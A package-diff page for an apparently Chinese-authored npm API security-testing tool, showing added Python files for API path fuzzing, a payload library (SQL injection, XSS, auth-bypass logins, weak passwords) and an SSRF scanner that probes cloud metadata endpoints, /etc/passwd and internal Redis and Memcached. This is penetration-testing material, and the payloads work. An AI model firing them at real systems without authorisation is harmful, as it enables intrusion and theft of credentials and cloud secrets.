npm - opencode-api-security-testing - Versions diffs - 3.0.10 → 3.0.11 - Mend

opencode-api-security-testing 3.0.10 → 3.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (71) hide show

package/README.md +74 -0
package/SKILL.md +1797 -0
package/core/advanced_recon.py +788 -0
package/core/agentic_analyzer.py +445 -0
package/core/analyzers/api_parser.py +210 -0
package/core/analyzers/response_analyzer.py +212 -0
package/core/analyzers/sensitive_finder.py +184 -0
package/core/api_fuzzer.py +422 -0
package/core/api_interceptor.py +525 -0
package/core/api_parser.py +955 -0
package/core/browser_tester.py +479 -0
package/core/cloud_storage_tester.py +1330 -0
package/core/collectors/__init__.py +23 -0
package/core/collectors/api_path_finder.py +300 -0
package/core/collectors/browser_collect.py +645 -0
package/core/collectors/browser_collector.py +411 -0
package/core/collectors/http_client.py +111 -0
package/core/collectors/js_collector.py +490 -0
package/core/collectors/js_parser.py +780 -0
package/core/collectors/url_collector.py +319 -0
package/core/context_manager.py +682 -0
package/core/deep_api_tester_v35.py +844 -0
package/core/deep_api_tester_v55.py +366 -0
package/core/dynamic_api_analyzer.py +532 -0
package/core/http_client.py +179 -0
package/core/models.py +296 -0
package/core/orchestrator.py +890 -0
package/core/prerequisite.py +227 -0
package/core/reasoning_engine.py +1042 -0
package/core/response_classifier.py +606 -0
package/core/runner.py +938 -0
package/core/scan_engine.py +599 -0
package/core/skill_executor.py +435 -0
package/core/skill_executor_v2.py +670 -0
package/core/skill_executor_v3.py +704 -0
package/core/smart_analyzer.py +687 -0
package/core/strategy_pool.py +707 -0
package/core/testers/auth_tester.py +264 -0
package/core/testers/idor_tester.py +200 -0
package/core/testers/sqli_tester.py +211 -0
package/core/testing_loop.py +655 -0
package/core/utils/base_path_dict.py +255 -0
package/core/utils/payload_lib.py +167 -0
package/core/utils/ssrf_detector.py +220 -0
package/core/verifiers/vuln_verifier.py +536 -0
package/package.json +1 -1
package/references/README.md +72 -0
package/references/asset-discovery.md +119 -0
package/references/fuzzing-patterns.md +129 -0
package/references/graphql-guidance.md +108 -0
package/references/intake.md +84 -0
package/references/pua-agent.md +192 -0
package/references/report-template.md +156 -0
package/references/rest-guidance.md +76 -0
package/references/severity-model.md +76 -0
package/references/test-matrix.md +86 -0
package/references/validation.md +78 -0
package/references/vulnerabilities/01-sqli-tests.md +1128 -0
package/references/vulnerabilities/02-user-enum-tests.md +423 -0
package/references/vulnerabilities/03-jwt-tests.md +499 -0
package/references/vulnerabilities/04-idor-tests.md +362 -0
package/references/vulnerabilities/05-sensitive-data-tests.md +466 -0
package/references/vulnerabilities/06-biz-logic-tests.md +501 -0
package/references/vulnerabilities/07-security-config-tests.md +511 -0
package/references/vulnerabilities/08-brute-force-tests.md +457 -0
package/references/vulnerabilities/09-vulnerability-chains.md +465 -0
package/references/vulnerabilities/10-auth-tests.md +537 -0
package/references/vulnerabilities/11-graphql-tests.md +355 -0
package/references/vulnerabilities/12-ssrf-tests.md +396 -0
package/references/vulnerabilities/README.md +148 -0
package/references/workflows.md +192 -0

package/core/utils/base_path_dict.py ADDED Viewed

@@ -0,0 +1,255 @@
+"""
+API Base Path 字典 - 常见API前缀/父路径
+当无法从JS中获取baseURL时使用此字典进行fuzzing
+"""
+# 常见API前缀/父路径（按优先级排序）
+COMMON_API_PREFIXES = [
+    # 标准REST API
+    "/api",
+    "/api/v1",
+    "/api/v2",
+    "/api/v3",
+    "/api/rest",
+    # 常见变体
+    "/webapi",
+    "/openapi",
+    "/rest",
+    "/rest/api",
+    "/api/rest",
+    # 管理类
+    "/admin",
+    "/manager",
+    "/backend",
+    "/server",
+    "/service",
+    # 认证类
+    "/auth",
+    "/oauth",
+    "/oauth2",
+    "/public",
+    # 业务类
+    "/user",
+    "/users",
+    "/customer",
+    "/customers",
+    "/order",
+    "/orders",
+    "/product",
+    "/products",
+]
+# 常见后端技术栈默认端口对应
+TECH_STACK_PORTS = {
+    "java": [8080, 8443, 8000, 9000],
+    "python": [5000, 8000, 8001],
+    "nodejs": [3000, 3001, 8080],
+    "php": [80, 8080, 443],
+    "go": [8080, 8000, 9090],
+    "asp.net": [80, 443, 8080],
+}
+# 常见API路径模式（用于识别已发现的API的父路径）
+API_PATH_PATTERNS = [
+    # user相关
+    r"/user/([^/]+)",  # /user/login, /user/info
+    r"/users?/([^/]+)",
+    # auth相关
+    r"/auth/([^/]+)",
+    r"/oauth/([^/]+)",
+    # admin相关
+    r"/admin/([^/]+)",
+    r"/manage/([^/]+)",
+    # api相关
+    r"/api/([^/]+)",
+    r"/v([0-9]+)/([^/]+)",
+]
+# 完整的base_path fuzzing字典（组合前缀）
+BASE_PATH_FUZZ_PATTERNS = [
+    # 直接拼接常见前缀
+    "/api/{}",
+    "/api/v1/{}",
+    "/api/v2/{}",
+    "/webapi/{}",
+    "/rest/{}",
+    "/auth/{}",
+    "/admin/{}",
+    "/backend/{}",
+    # 带版本的
+    "/{}/v1",
+    "/{}/v2",
+    "/{}/v3",
+    # 带api前缀
+    "/api/{}/v1",
+    "/api/{}/v2",
+]
+def get_base_path_candidates(discovered_path):
+    """
+    根据已发现的API路径生成可能的base_path候选
+    例如:
+    - discovered = "/user/login" -> candidates = ["/user", "/", ""]
+    - discovered = "/api/v1/user/info" -> candidates = ["/api/v1", "/api", "/"]
+    """
+    candidates = []
+    parts = discovered_path.strip("/").split("/")
+    for i in range(1, len(parts)):
+        candidate = "/" + "/".join(parts[:i])
+        candidates.append(candidate)
+    candidates.append("/")  # 根路径
+    candidates.append("")   # 空路径（相对路径）
+    return list(set(candidates))
+def generate_fuzz_paths(path, prefixes=None):
+    """
+    生成fuzzing用的完整路径列表
+    参数:
+        path: 已发现的API路径（如 "user/login"）
+        prefixes: 自定义前缀列表（可选）
+    返回:
+        完整的fuzzing路径列表
+    """
+    if prefixes is None:
+        prefixes = COMMON_API_PREFIXES
+    fuzz_paths = []
+    path_parts = path.strip("/").split("/")
+    # 生成各种组合
+    for prefix in prefixes:
+        # prefix + 完整path
+        fuzz_paths.append(f"{prefix}/{path}")
+        # prefix + 最后一个path
+        if path_parts:
+            fuzz_paths.append(f"{prefix}/{path_parts[-1]}")
+    # 加上原始path
+    fuzz_paths.append("/" + path)
+    fuzz_paths.append(path)
+    return list(set(fuzz_paths))
+# 测试
+if __name__ == "__main__":
+    print("=== Base Path Dictionary ===")
+    print(f"Common prefixes: {len(COMMON_API_PREFIXES)}")
+    print(f"Tech stack ports: {len(TECH_STACK_PORTS)}")
+    print("\n=== Candidates for /api/v1/user/login ===")
+    candidates = get_base_path_candidates("/api/v1/user/login")
+    for c in candidates:
+        print(f"  {c}")
+    print("\n=== Fuzz paths for 'user/login' ===")
+    fuzz_paths = generate_fuzz_paths("user/login")
+    for p in fuzz_paths[:10]:
+        print(f"  {p}")
+def get_base_path_multi_dimensional(target_url, js_content=None, headers=None):
+    """
+    【新增】多维度获取base_path
+    维度1: 从JS配置中获取baseURL
+    维度2: 从响应头分析nginx/后端技术
+    维度3: 从已发现API路径反推
+    维度4: 探测常见后端端口
+    维度5: 分析URL模式推断
+    输入:
+        target_url: 目标URL
+        js_content: JS内容（可选）
+        headers: 响应头（可选）
+    输出:
+        {
+            base_path: string - 发现的base_path,
+            confidence: float - 置信度,
+            source: string - 来源,
+            candidates: [] - 候选路径
+        }
+    """
+    import requests
+    requests.packages.urllib3.disable_warnings()
+    result = {
+        'base_path': None,
+        'confidence': 0.0,
+        'source': None,
+        'candidates': []
+    }
+    # 维度1: 从JS配置获取
+    if js_content:
+        import re
+        baseurls = re.findall(r'baseURL\s*:\s*["\']([^"\']+)["\']', js_content)
+        if baseurls and baseurls[0]:
+            result['base_path'] = baseurls[0]
+            result['confidence'] = 1.0
+            result['source'] = 'js_config'
+            return result
+    # 维度2: 从响应头分析
+    try:
+        resp = requests.head(target_url, timeout=5, verify=False)
+        server = resp.headers.get('Server', '')
+        powered_by = resp.headers.get('X-Powered-By', '')
+        # nginx特征
+        if 'nginx' in server.lower():
+            result['candidates'].append('')
+            result['candidates'].append('/api')
+            if 'nginx' in server.lower():
+                result['confidence'] = 0.6
+                result['source'] = 'nginx_proxy'
+        # PHPStudy
+        if 'PHP' in powered_by:
+            result['candidates'].append('')
+            result['candidates'].append('/api')
+    except:
+        pass
+    # 维度3: 从URL路径推断
+    parsed = requests.packages.urllib3.util.urlparse(target_url)
+    path_parts = parsed.path.strip('/').split('/')
+    # 如果URL包含登录页路径
+    if 'login' in parsed.path.lower():
+        # 尝试获取根路径
+        candidates = [
+            '',  # 相对路径
+            '/api',
+            '/auth',
+            '/user',
+            '/' + path_parts[0] if path_parts else '',
+        ]
+        result['candidates'].extend([c for c in candidates if c])
+        result['confidence'] = 0.5
+        result['source'] = 'url_inference'
+    # 维度4: 返回最可能的候选
+    if result['candidates']:
+        result['base_path'] = result['candidates'][0]
+    return result

package/core/utils/payload_lib.py ADDED Viewed

@@ -0,0 +1,167 @@
+"""
+Payload库 - 管理测试Payload
+输入: {type, count}
+输出: {payloads, descriptions, risk_levels}
+"""
+# SQL注入Payload
+SQLI_PAYLOADS = [
+    # 基于错误的注入
+    "' OR '1'='1",
+    "' OR '1'='1' --",
+    "' OR '1'='1' #",
+    "admin'--",
+    "admin' OR '1'='1",
+    # UNION注入
+    "' UNION SELECT NULL--",
+    "' UNION SELECT NULL,NULL--",
+    "' UNION SELECT 1,2,3--",
+    "1' UNION SELECT NULL--",
+    # 布尔注入
+    "1' AND '1'='1",
+    "1' AND '1'='2",
+    "1' OR '1'='1",
+    # 时间盲注
+    "1' AND SLEEP(5)--",
+    "1'; WAITFOR DELAY '00:00:05'--",
+    # 二次注入
+    "test'--",
+]
+# XSS Payload
+XSS_PAYLOADS = [
+    "<script>alert(1)</script>",
+    "<img src=x onerror=alert(1)>",
+    "'><script>alert(String.fromCharCode(88,83,83))</script>",
+    "<svg/onload=alert(1)>",
+    "javascript:alert(1)",
+    "<iframe src=javascript:alert(1)>",
+    "<body onload=alert(1)>",
+    "<input onfocus=alert(1) autofocus>",
+]
+# IDOR测试ID
+IDOR_TEST_IDS = [
+    1, 2, 3, 4, 5, 10, 100, 999, 9999,
+    "admin", "test", "user",
+    "a" * 32,
+]
+# JWT测试
+JWT_PAYLOADS = [
+    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c",
+    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTM1OTk2MjU2LCJleHAiOjE5MTc1NTYyNTYsIm5iZiI6MTUzNTk5NjI1NiwianRpIjoiIiwic3ViIjoiYWRtaW4iLCJyb2xlIjoiUk9MRV9BRE1JTiJ9",
+]
+# 认证绕过Payload
+AUTH_BYPASS_PAYLOADS = [
+    {"username": "admin", "password": "admin"},
+    {"username": "admin", "password": "123456"},
+    {"username": "admin", "password": "admin123"},
+    {"username": "test", "password": "test"},
+    {"username": "' OR '1'='1", "password": "any"},
+    {"username": "admin'--", "password": "any"},
+    {"username": "1' OR '1'='1", "password": "1"},
+]
+# 弱密码
+WEAK_PASSWORDS = [
+    "123456", "password", "admin", "admin123",
+    "123123", "000000", "111111", "12345678",
+    "qwerty", "abc123", "1234", "12345"
+]
+def get_payloads(config):
+    """
+    获取Payload库
+    输入:
+        type: "sqli" | "xss" | "idor" | "jwt" | "auth_bypass"
+        count?: number - 返回数量
+    输出:
+        payloads: string[]
+        descriptions: string[]
+        risk_levels: string[]
+    """
+    payload_type = config.get('type', 'sqli')
+    count = config.get('count', 10)
+    if payload_type == 'sqli':
+        payloads = SQLI_PAYLOADS[:count]
+        descriptions = [
+            "通用布尔注入",
+            "注释绕过",
+            "OR注入",
+            "管理员绕过",
+            "UNION注入",
+        ] * (count // 5 + 1)
+        risk_levels = ['high'] * count
+    elif payload_type == 'xss':
+        payloads = XSS_PAYLOADS[:count]
+        descriptions = [
+            "script标签",
+            "img标签onerror",
+            "script标签绕过",
+            "svg标签",
+            "javascript伪协议",
+        ] * (count // 5 + 1)
+        risk_levels = ['high'] * count
+    elif payload_type == 'idor':
+        payloads = IDOR_TEST_IDS[:count]
+        descriptions = ["数字ID"] * count
+        risk_levels = ['medium'] * count
+    elif payload_type == 'jwt':
+        payloads = JWT_PAYLOADS[:count]
+        descriptions = ["JWT测试token"] * count
+        risk_levels = ['high'] * count
+    elif payload_type == 'auth_bypass':
+        payloads = AUTH_BYPASS_PAYLOADS[:count]
+        descriptions = ["弱口令", "SQL注入绕过"] * (count // 2 + 1)
+        risk_levels = ['high'] * count
+    else:
+        payloads = []
+        descriptions = []
+        risk_levels = []
+    return {
+        'payloads': payloads[:count],
+        'descriptions': descriptions[:count],
+        'risk_levels': risk_levels[:count]
+    }
+def get_sqli_payloads():
+    """获取SQL注入Payload"""
+    return SQLI_PAYLOADS
+def get_xss_payloads():
+    """获取XSS Payload"""
+    return XSS_PAYLOADS
+def get_idor_test_ids():
+    """获取IDOR测试ID"""
+    return IDOR_TEST_IDS
+def get_weak_passwords():
+    """获取弱密码列表"""
+    return WEAK_PASSWORDS
+if __name__ == '__main__':
+    # 测试
+    result = get_payloads({'type': 'sqli', 'count': 5})
+    print(f"Payloads: {result['payloads']}")

package/core/utils/ssrf_detector.py ADDED Viewed

@@ -0,0 +1,220 @@
+"""
+SSRF漏洞检测模块
+检测API中的SSRF（服务器端请求伪造）漏洞
+"""
+import requests
+import re
+requests.packages.urllib3.disable_warnings()
+def detect_ssrf(target_url, api_path, param_name='url', method='GET'):
+    """
+    检测SSRF漏洞
+    输入:
+        target_url: 目标URL（如 http://example.com）
+        api_path: API路径（如 /hszh/WxApi/getTQUserInfo）
+        param_name: 可能存在SSRF的参数名
+        method: 请求方法（GET/POST）
+    输出:
+        {
+            vulnerable: boolean,
+            findings: [],
+            confidence: float
+        }
+    """
+    result = {
+        'vulnerable': False,
+        'findings': [],
+        'confidence': 0.0
+    }
+    full_url = target_url.rstrip('/') + api_path
+    # SSRF测试payloads
+    ssrf_payloads = [
+        # 本地回环
+        ('http://127.0.0.1', 'Localhost'),
+        ('http://127.0.0.1:8080', 'Localhost:8080'),
+        ('http://localhost', 'localhost'),
+        ('http://0.0.0.0', '0.0.0.0'),
+        # 云元数据
+        ('http://169.254.169.254/latest/meta-data/', 'AWS Metadata'),
+        ('http://metadata.google.internal/', 'GCP Metadata'),
+        # 内网探测
+        ('http://192.168.1.1', 'Private IP'),
+        ('http://10.0.0.1', '10.x Private'),
+        ('http://172.16.0.1', '172.16.x Private'),
+        # 协议变种
+        ('file:///etc/passwd', 'File Protocol'),
+        ('dict://127.0.0.1:11211/stats', 'Memcached'),
+        ('gopher://127.0.0.1:6379/_INFO', 'Redis'),
+    ]
+    for payload, description in ssrf_payloads:
+        try:
+            if method == 'POST':
+                r = requests.post(full_url, data={param_name: payload}, verify=False, timeout=5)
+            else:
+                r = requests.get(full_url, params={param_name: payload}, verify=False, timeout=5)
+            # 检查响应判断是否成功探测
+            findings = analyze_ssrf_response(r, payload, description)
+            result['findings'].extend(findings)
+        except requests.exceptions.Timeout:
+            result['findings'].append({
+                'payload': payload,
+                'description': description,
+                'type': 'timeout',
+                'info': '请求超时，可能存在防火墙'
+            })
+        except Exception as e:
+            result['findings'].append({
+                'payload': payload,
+                'description': description,
+                'type': 'error',
+                'info': str(e)[:50]
+            })
+    # 判断是否有SSRF
+    if result['findings']:
+        success_findings = [f for f in result['findings'] if f['type'] == 'ssrf_found']
+        if success_findings:
+            result['vulnerable'] = True
+            result['confidence'] = min(1.0, len(success_findings) * 0.3 + 0.4)
+    return result
+def analyze_ssrf_response(response, payload, description):
+    """
+    分析响应判断是否为SSRF
+    返回:
+        list - 发现的问题
+    """
+    findings = []
+    # 检查是否有请求发送（响应时间异常）
+    elapsed = response.elapsed.total_seconds()
+    if elapsed > 3 and 'localhost' in payload.lower():
+        findings.append({
+            'payload': payload,
+            'description': description,
+            'type': 'slow_response',
+            'info': f'响应时间 {elapsed:.1f}秒，可能连接到内部服务'
+        })
+    # 检查响应内容
+    response_text = response.text.lower()
+    # 检测内网服务响应特征
+    ssrf_indicators = {
+        'aws_metadata': ['ami-id', 'instance-id', 'local-hostname', 'local-ipv4'],
+        'redis': ['redis_version', 'connected_clients', 'role:'],
+        'memcached': ['stats', 'version', 'pid'],
+        'http_banner': ['server:', 'apache', 'nginx', 'microsoft', 'tomcat'],
+        'internal_error': ['connection refused', 'connection timeout', 'no route to host'],
+    }
+    for indicator_type, keywords in ssrf_indicators.items():
+        for keyword in keywords:
+            if keyword in response_text:
+                findings.append({
+                    'payload': payload,
+                    'description': description,
+                    'type': 'ssrf_found',
+                    'info': f'发现{indicator_type}特征: {keyword}',
+                    'severity': 'high'
+                })
+                break
+    # 检查是否是200状态码但响应异常（可能代理了请求）
+    if response.status_code == 200:
+        if 'html' not in response.headers.get('content-type', '').lower():
+            if len(response.text) < 100 and 'error' not in response_text:
+                findings.append({
+                    'payload': payload,
+                    'description': description,
+                    'type': 'ssrf_suspect',
+                    'info': f'小响应({len(response.text)}字节)，可能是代理响应',
+                    'severity': 'medium'
+                })
+    return findings
+def check_ssrf_params(js_content):
+    """
+    从JS内容中检测可能存在SSRF的参数
+    输入:
+        js_content: JS文件内容
+    输出:
+        ssrf_params: [{
+            param: string,
+            context: string,
+            api_path: string
+        }]
+    """
+    import re
+    ssrf_params = []
+    # 常见的SSRF敏感参数
+    ssrf_param_names = [
+        'url', 'uri', 'path', 'site', 'html', 'val', 'validate',
+        'domain', 'callback', 'page', 'feed', 'host', 'port', 'to',
+        'out', 'view', 'dir', 'ip', 'name', 'tqToken', 'userToken',
+        'file', 'reference', 'redirect', 'next', 'data', 'q', 'urlEncoded',
+        'xml', 'xsl', 'template', 'php_path', 'style', 'doc', 'img'
+    ]
+    # 查找这些参数的使用
+    for param in ssrf_param_names:
+        # 查找param作为key的使用
+        pattern = rf'["\']({param})["\']\s*:\s*["\']([^"\']+)["\']'
+        matches = re.findall(pattern, js_content, re.I)
+        for m in matches:
+            param_name, param_value = m
+            if any(x in param_value.lower() for x in ['http', 'file://', 'ftp']):
+                ssrf_params.append({
+                    'param': param_name,
+                    'value': param_value,
+                    'context': 'url_value_found',
+                    'risk': 'high'
+                })
+    # 查找http请求模式
+    http_patterns = [
+        r'(?:url|uri|path)\s*[:=]\s*[\"\'](https?://[^\s"\']+)[\"\']',
+        r'(?:url|uri|path)\s*:\s*[\w.]+\s*\(\s*[\"\'](https?://[^\s"\']+)[\"\']',
+    ]
+    for pattern in http_patterns:
+        matches = re.findall(pattern, js_content, re.I)
+        for m in matches:
+            ssrf_params.append({
+                'param': 'url_in_code',
+                'value': m,
+                'context': 'hardcoded_url',
+                'risk': 'low'
+            })
+    return ssrf_params
+if __name__ == '__main__':
+    # 测试
+    result = check_ssrf_params('url="http://example.com"')
+    print(f"SSRF params: {result}")